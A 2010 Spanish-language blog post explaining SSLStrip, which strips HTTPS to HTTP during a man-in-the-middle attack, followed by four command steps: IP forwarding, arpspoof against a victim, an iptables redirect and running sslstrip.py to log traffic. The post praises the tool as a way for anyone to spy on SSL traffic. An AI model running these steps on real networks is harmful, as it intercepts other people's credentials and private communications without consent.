lunes, 7 de junio de 2010

SSLStrip – Espiando tráfico SSL

SSLStrip – Espiando tráfico SSL: "

Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede espiar tu trafico SSL sin problemas.


SSLStrip


El funcionamiento de SSLStrip es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.


A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.



En resumen, los pasos serian:


1. Configurar IP Forwarding:


echo 1 > /proc/sys/net/ipv4/ip_forward


2. Realizando ataque ARP MITM entre las 2 maquinas:


arpspoof -i eth0 -t VICTIMA HOST


3. Redireccionar trafico con iptables:


iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080


4. Iniciar SSLStrip en el puerto utilizado


python sslstrip.py -w archivo


Espero que les sea de utilidad y no olviden comentar ;-)


Mas Información:

Pagina Oficial del SSLStrip


También puede interesarte...




"

1 comentario: